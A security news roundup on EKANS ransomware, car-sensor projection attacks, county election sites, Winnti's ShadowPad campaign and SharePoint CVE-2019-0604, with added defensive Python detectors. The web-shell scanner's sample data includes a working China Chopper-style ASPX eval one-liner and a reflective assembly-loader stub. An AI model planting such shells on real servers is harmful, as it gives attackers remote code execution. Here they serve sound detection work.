Ransomware for industrial control systems.
Dragos has released a report on EKANS, a ransomware strain first observed in December 2019. EKANS is notable among ransomware strains because it terminates the processes named on a hardcoded "kill list", and several of those processes belong to industrial control system (ICS) software. EKANS was apparently preceded by a new version of the MegaCortex ransomware released in mid-2019, whose kill list named more than a thousand IT-related processes with a handful of ICS-specific processes among them. EKANS targets just sixty-four processes, the majority of which are related to ICS products. Every ICS-related process on EKANS's list also appears on MegaCortex's, which suggests that EKANS's developers copied their list from MegaCortex.
Dragos emphasizes that EKANS and the new version of MegaCortex are the first known instances of ransomware whose kill lists specifically name ICS processes. The processes EKANS targets belong to ICS products such as GE's Proficy data historian, GE Fanuc licensing server services, Honeywell's HMIWeb application, the FLEXNet and Sentinel HASP license managers, and the ThingWorx Industrial Connectivity Suite. EKANS has no ability to manipulate ICS operations themselves, but killing historian, HMI and license-manager processes (and then encrypting the hosts they run on) can cause a loss of view into the industrial process, which is a real operational and safety risk.
Researchers at OTORIO also analyzed EKANS (which they refer to as "SNAKE") and concluded that the malware was probably linked to Iranian state-backed threat actors, but Dragos's researchers are extremely skeptical about OTORIO's conclusion, stating that any connection to Iran is "incredibly tenuous based upon available evidence." They believe the malware is more likely the work of "non-state elements pursuing financial gain."
Dragos is more concerned about the trend that EKANS signifies than they are about its ability to disrupt operations. The researchers state that "[w]hile all indications at present show a relatively primitive attack mechanism on control system networks, the specificity of processes listed in a static 'kill list' shows a level of intentionality previously absent from ransomware targeting the industrial space."
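The behaviour Dragos describes, one actor terminating several ICS processes in quick succession, is detectable without knowing the exact kill list. The following is an added example, not code from the Dragos report: it slides a short time window over a constructed stream of process-termination records and alerts when one process kills at least three distinct ICS processes inside the window. The process names in the table are illustrative stand-ins for the product families named above, not EKANS's real list, and the record format assumes an EDR or ETW source that records which process called TerminateProcess (Sysmon's Event ID 5 alone does not).

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Illustrative process names for the product families the article mentions.
# These are assumptions for the demo, NOT EKANS's real 64-entry list (which
# is in the Dragos report); substitute the names from the report or from
# your own asset inventory.
ICS_PROCESS_FAMILIES = {
    "ihdataarchiver.exe": "GE Proficy Historian",
    "lmgrd.exe": "FLEXNet license manager",
    "hasplms.exe": "Sentinel HASP license manager",
    "hmiweb.exe": "Honeywell HMIWeb",
    "twindustrialgateway.exe": "ThingWorx Industrial Connectivity",
}

WINDOW_SECONDS = 10   # how close together the kills must be
THRESHOLD = 3         # distinct ICS processes one actor must kill


def parse_record(line):
    """Parse a constructed 'timestamp|actor_pid|actor_image|victim_image' record.
    Sysmon's Event ID 5 (ProcessTerminate) does not say who did the killing,
    so this record shape assumes an EDR/ETW source that records the caller."""
    ts, pid, actor, victim = line.strip().split("|")
    return datetime.fromisoformat(ts), int(pid), actor.lower(), victim.lower()


def detect_kill_list(lines, window_seconds=WINDOW_SECONDS, threshold=THRESHOLD):
    """Return {(pid, actor_image): [ICS product families killed]} for every
    actor that terminated at least `threshold` distinct ICS processes inside
    a sliding window of `window_seconds`."""
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)          # actor -> (ts, victim) kills in the window
    alerts = {}
    for line in lines:
        ts, pid, actor, victim = parse_record(line)
        if victim not in ICS_PROCESS_FAMILIES:
            continue                     # non-ICS kills are noise for this rule
        key = (pid, actor)
        kills = recent[key]
        kills.append((ts, victim))
        while kills and ts - kills[0][0] > window:
            kills.popleft()              # slide the window forward
        victims = {v for _, v in kills}
        if len(victims) >= threshold:
            alerts[key] = sorted(ICS_PROCESS_FAMILIES[v] for v in victims)
    return alerts


# Constructed telemetry, not real logs: an admin restarting one license
# server, then an unknown binary sweeping through four ICS processes in two
# seconds, then the admin again half an hour later (outside any window).
SAMPLE_RECORDS = [
    "2020-02-04T09:00:00|1201|taskkill.exe|lmgrd.exe",
    "2020-02-04T09:14:05|4242|update.exe|notepad.exe",
    "2020-02-04T09:14:05|4242|update.exe|ihdataarchiver.exe",
    "2020-02-04T09:14:06|4242|update.exe|hasplms.exe",
    "2020-02-04T09:14:06|4242|update.exe|hmiweb.exe",
    "2020-02-04T09:14:07|4242|update.exe|lmgrd.exe",
    "2020-02-04T09:30:00|1201|taskkill.exe|hasplms.exe",
]

if __name__ == "__main__":
    for (pid, actor), families in detect_kill_list(SAMPLE_RECORDS).items():
        print(f"ALERT pid={pid} image={actor} killed: {', '.join(families)}")
```

The distinct-victim threshold is what separates a kill list from an operator restarting one service; an admin who stops a single license manager twice in an hour never reaches it, while the sweep in the sample does on its third ICS victim.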
An onomastic note: "EKANS" is "SNAKE" spelled backwards, and some researchers have called this particular ransomware by that latter name. Dragos, to avoid confusion with Turla (also known as "Snake"), prefers "EKANS."
Autonomous vehicles tricked by projections.
Researchers at Ben-Gurion University of the Negev have found that advanced driver-assistance and semi-autonomous driving systems can be fooled by images projected, for instance from a drone-mounted projector, onto objects near the road or onto the road surface itself. By projecting a two-dimensional image of a person or vehicle onto the road, they could make a car brake hard. More seriously, the car could be tricked into following fake lane markings into the oncoming lane, or into reading a phantom speed limit sign and accepting a limit much higher than the real one. Both the Mobileye 630 PRO and the Tesla Model X (HW 2.5) were found to be susceptible to these attacks.
US county websites lack security measures.
A survey by McAfee found that most county websites in the thirteen swing states for the 2020 US election are not on .gov domains, and nearly half of them do not use HTTPS. 83% of the county sites in these states lack the validation that comes with a .gov registration, which is available only to verified US government bodies; a county on a .com, .org or .us domain gives voters no such assurance, and anyone can register a lookalike name and spoof the site to spread disinformation. The problem is magnified by the fact that many states lack consistent website naming standards, so the URL structure of one county's site might be completely different from another county's. McAfee emphasizes that "[i]f a malicious foreign actor can spoof government websites, he can send hundreds of thousands of emails to voters and use both those emails and the websites to which they are tied to send voters information on the wrong polling places, phony voter registration processes or requirements (barriers), or other incorrect voting instructions that could suppress, misdirect, or otherwise disrupt a key county's electorate from voting." Some states have tried to establish their own naming convention, such as www.co.[county name].[two-letter state abbreviation].us, but McAfee thinks these are too inconsistent and confusing to serve as a reliable guide for voters. Plain HTTP adds a second problem: a page served without TLS can be read and altered in transit, so even a genuine county site cannot be trusted by a visitor on an untrusted network.
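The checks in the survey (.gov or not, HTTPS or not, state naming convention or not) are easy to run over a list of county URLs, and a fourth check, a hostname that contains "gov" without being under .gov, catches the spoofing pattern McAfee warns about. The following is an added example, not McAfee's survey tooling; the URLs are constructed for the demo and describe no real county, and the regular expression for the state convention is an assumption based on the pattern quoted above.

```python
import re
from urllib.parse import urlsplit

# Assumed regex for the 'www.co.[county name].[two-letter state].us' convention
# the article describes; it captures county and state for reporting.
STATE_CONVENTION = re.compile(
    r"^(?:www\.)?co\.(?P<county>[a-z0-9-]+)\.(?P<state>[a-z]{2})\.us$"
)


def assess(url):
    """Classify one county site URL the way the survey does, plus a lookalike flag."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    is_gov = host.endswith(".gov")
    m = STATE_CONVENTION.match(host)
    return {
        "url": url,
        "https": parts.scheme == "https",
        "dotgov": is_gov,
        "state_convention": bool(m),
        "county": m.group("county") if m else None,
        "state": m.group("state") if m else None,
        # 'gov' in a hostname outside .gov is exactly what a spoofed site would
        # use: anyone can register such a name, whereas .gov registration is
        # restricted to US government bodies.
        "lookalike": (not is_gov) and "gov" in host,
    }


def summarize(urls):
    """Aggregate the per-site assessments into survey-style counts."""
    rows = [assess(u) for u in urls]
    return {
        "total": len(rows),
        "not_dotgov": sum(1 for r in rows if not r["dotgov"]),
        "no_https": sum(1 for r in rows if not r["https"]),
        "state_convention": sum(1 for r in rows if r["state_convention"]),
        "lookalikes": [r["url"] for r in rows if r["lookalike"]],
    }


# Constructed sample list; no real county or state is described ('xx' is a
# placeholder state abbreviation).
SAMPLE_URLS = [
    "https://www.examplecounty.gov/elections",
    "http://www.co.example.xx.us/vote",
    "https://examplecountyvotes.org/",
    "http://example-county-gov.com/",
    "https://co.sample.xx.us/",
]

if __name__ == "__main__":
    for row in map(assess, SAMPLE_URLS):
        print(row)
    print(summarize(SAMPLE_URLS))
```

A live HTTPS probe belongs in a separate step, since a URL list only records what the county publishes; the classification here is what the survey percentages are built from.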
Winnti Group spies on Hong Kong universities.
ESET uncovered a campaign by the China-linked Winnti Group against at least two universities in Hong Kong. The group is using a new launcher to deploy a new variant of the ShadowPad backdoor on computers at these schools. The launcher is executed through DLL side-loading: a malicious DLL that imitates a library used by HP's legitimate printing and scanning software is placed where the legitimate HP executable will load it in place of the real library. That DLL decrypts and executes the shellcode that initializes ShadowPad.
This version of ShadowPad contains seventeen modules for different functionalities. Unlike some other versions of the malware, this variant of ShadowPad has a keylogging module which is active by default, indicating that the attackers are intent on stealing information. Since students of these universities played a large role in the Hong Kong protests, it's reasonable to assume that the campaign is focused on gleaning intelligence about the protests' participants.
The names of the universities were hardcoded into both the malware samples and the command-and-control URLs used in the campaign, so the researchers conclude that the attacks are highly targeted. They also identified C&C URLs containing the names of three other Hong Kong universities, suggesting a total of five schools were targeted.
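Side-loading of the kind ESET describes leaves a consistent trace in image-load telemetry: a vendor executable loads a DLL from its own directory (which Windows searches before System32) and that DLL is unsigned, or signed by someone other than the vendor. The following is an added example, not ESET's tooling, that applies that rule to a constructed set of Sysmon Event ID 7 (ImageLoad) records. The field names are Sysmon's, but "scan.exe", "evimg.dll" and "Example Vendor Inc" are stand-ins for the HP binary and library; neither the real names nor the real paths from the campaign are used.

```python
import ntpath

# Assumption: the Authenticode publisher we expect on each vendor executable we
# track, verified out of band. Names here are stand-ins, not the HP binary's.
EXPECTED_SIGNER = {"scan.exe": "example vendor inc"}
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")

UNSIGNED = "unsigned DLL loaded from the executable's own directory"
BAD_SIG = "DLL signature present but not valid"
WRONG_SIGNER = "DLL signed by a different publisher than the executable"


def parse_event(line):
    """Parse a constructed 'Key=Value; Key=Value' Sysmon ImageLoad record."""
    fields = {}
    for kv in line.split(";"):
        if "=" in kv:
            k, v = kv.split("=", 1)
            fields[k.strip()] = v.strip()
    return fields


def classify(ev):
    """Return a reason string if this ImageLoad looks like side-loading, else None.
    Windows resolves a DLL name against the application's own directory before
    System32, so a same-named DLL planted beside the exe wins the search."""
    exe, dll = ev["Image"], ev["ImageLoaded"]
    exe_name = ntpath.basename(exe).lower()
    if exe_name not in EXPECTED_SIGNER:
        return None                          # not a vendor binary we track
    dll_dir = ntpath.dirname(dll).lower()
    if dll_dir.startswith(SYSTEM_DIRS):
        return None                          # OS DLLs from System32 are expected
    if dll_dir != ntpath.dirname(exe).lower():
        return None                          # not loaded from beside the exe
    if ev.get("Signed", "false").lower() != "true":
        return UNSIGNED
    if ev.get("SignatureStatus", "").lower() != "valid":
        return BAD_SIG
    if ev.get("Signature", "").lower() != EXPECTED_SIGNER[exe_name]:
        return WRONG_SIGNER
    return None


def find_sideloads(lines):
    """Return [(dll_name, process_path, reason)] for every suspicious load."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        reason = classify(ev)
        if reason:
            findings.append((ntpath.basename(ev["ImageLoaded"]).lower(), ev["Image"], reason))
    return findings


# Constructed Sysmon Event ID 7 records (field names are Sysmon's; values are made up).
SAMPLE_EVENTS = [
    # Vendor exe loading its own vendor-signed library: benign.
    r"Image=C:\Program Files\Example Vendor\scan.exe; ImageLoaded=C:\Program Files\Example Vendor\evimg.dll; Signed=true; Signature=Example Vendor Inc; SignatureStatus=Valid",
    # OS DLL from System32: benign.
    r"Image=C:\Program Files\Example Vendor\scan.exe; ImageLoaded=C:\Windows\System32\kernel32.dll; Signed=true; Signature=Microsoft Windows; SignatureStatus=Valid",
    # Vendor exe copied to a temp directory with an unsigned look-alike DLL beside it: side-load.
    r"Image=C:\Users\alice\AppData\Local\Temp\evupd\scan.exe; ImageLoaded=C:\Users\alice\AppData\Local\Temp\evupd\evimg.dll; Signed=false; Signature=; SignatureStatus=Unavailable",
    # Same-named DLL in the install directory but signed by someone else: side-load.
    r"Image=C:\Program Files\Example Vendor\scan.exe; ImageLoaded=C:\Program Files\Example Vendor\evimg.dll; Signed=true; Signature=Some Other Publisher; SignatureStatus=Valid",
]

if __name__ == "__main__":
    for dll, proc, why in find_sideloads(SAMPLE_EVENTS):
        print(f"{dll} loaded by {proc}: {why}")
```

The rule deliberately ignores which directory the executable itself lives in: the third sample shows the common variant where the legitimate signed binary is copied next to the malicious DLL in a user-writable path, which path-based allowlists miss.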
SharePoint vulnerability exploited to access government organizations.
Palo Alto Networks Unit 42 reports that a threat actor attacked two government organizations in two different Middle Eastern countries by exploiting CVE-2019-0604, a widely targeted remote code execution vulnerability in Microsoft SharePoint that Microsoft patched in early 2019. The attacker installed several web shells, including AntSword, on the compromised servers, then used them to dump credentials with a custom variant of Mimikatz.
The researchers note that the China-linked APT27 (also known as Emissary Panda) exploited CVE-2019-0604 against government entities in two Middle Eastern countries in April 2019. Those attacks used the China Chopper web shell, which Unit 42 describes as "incredibly similar" to AntSword. Both web shells are publicly available, however, so shared tooling alone is not enough evidence to conclude that the two campaigns are related.
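Both China Chopper and AntSword drive the same kind of server-side stub: a tiny page that evaluates whatever the client sends in a request parameter. That makes the stubs themselves the thing to hunt for on a SharePoint server after an incident like this one. The following is an added example, not Unit 42's tooling: a scoring scanner that flags ASPX sources showing the one-liner eval pattern (the sample shell follows the long-published China Chopper ASPX form and is only scanned, never executed), a reflective assembly-loader variant, and leaves an ordinary data-binding page alone. The sample files, their paths, the weights and the threshold are constructed for the demo and should be tuned against your own application corpus.

```python
import os
import re

FLAG_THRESHOLD = 4   # assumption; tune against a corpus of your own pages

# (pattern, weight, description); weights are illustrative.
INDICATORS = [
    (re.compile(r"\beval\s*\(\s*Request\b", re.I), 5, "eval over a request parameter"),
    (re.compile(r"[\"']unsafe[\"']", re.I), 3, "JScript eval 'unsafe' flag"),
    (re.compile(r"Language\s*=\s*[\"']Jscript[\"']", re.I), 2, "JScript page language"),
    (re.compile(r"System\.Reflection\.Assembly\.Load\b", re.I), 3, "runtime assembly loading"),
    (re.compile(r"Request\.(Item|Form|QueryString)\s*\[", re.I), 1, "direct request indexer"),
]


def score_page(text):
    """Return (score, [indicator descriptions]) for one server page's source."""
    hits = [(w, d) for pat, w, d in INDICATORS if pat.search(text)]
    return sum(w for w, _ in hits), [d for _, d in hits]


def scan(pages):
    """pages: {path: source}. Return [(path, score, hits)] at or above the
    threshold, highest score first."""
    flagged = []
    for path, src in pages.items():
        s, hits = score_page(src)
        if s >= FLAG_THRESHOLD:
            flagged.append((path, s, hits))
    return sorted(flagged, key=lambda t: -t[1])


def scan_dir(root, exts=(".aspx", ".ashx", ".asmx")):
    """Walk a web root (e.g. a SharePoint LAYOUTS tree) and scan matching files."""
    pages = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    pages[path] = fh.read()
    return scan(pages)


# Constructed sample sources; the paths are invented and the shells are inert here.
SAMPLE_PAGES = {
    # One-liner in the long-published China Chopper ASPX form.
    "site/images/upload.aspx":
        '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>',
    # Reflective loader: no eval, but loads an assembly sent in a POST field.
    "site/err.aspx":
        '<%@ Page Language="C#" %><% System.Reflection.Assembly.Load('
        'Convert.FromBase64String(Request.Form["d"])).CreateInstance("U"); %>',
    # Ordinary page: data-binding Eval() is not an eval over request input.
    "site/Default.aspx":
        '<%@ Page Language="C#" AutoEventWireup="true" CodeBehind="Default.aspx.cs" Inherits="Portal.Default" %>\n'
        '<asp:Repeater runat="server"><ItemTemplate><%# Eval("Title") %></ItemTemplate></asp:Repeater>',
}

if __name__ == "__main__":
    import sys
    results = scan_dir(sys.argv[1]) if len(sys.argv) > 1 else scan(SAMPLE_PAGES)
    for path, s, hits in results:
        print(f"{s:3d}  {path}  ({'; '.join(hits)})")
```

Run it against a SharePoint web root with the path as the first argument; with no argument it scans the embedded samples. Scores are a triage aid, not a verdict: a flagged file still needs its creation time, owner and IIS access log entries checked.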
It's also worth mentioning that Unit 42's Shodan search turned up 28,881 Internet-accessible SharePoint servers that are apparently still vulnerable to CVE-2019-0604 nearly a year after patches were released (a banner search cannot confirm patch level, so treat the figure as an upper bound on exposure rather than a count of confirmed-vulnerable hosts). ZDNet attributes part of this to Microsoft's somewhat convoluted patching process: the company released three different patches in February, March, and April 2019, and the vulnerability wasn't fully fixed until the April patch. As a result, many organizations may believe they've fixed the flaw because they installed the incomplete February or March patches. The check that matters is whether the April 2019 or a later SharePoint update is installed, not whether any 2019 patch referencing CVE-2019-0604 is.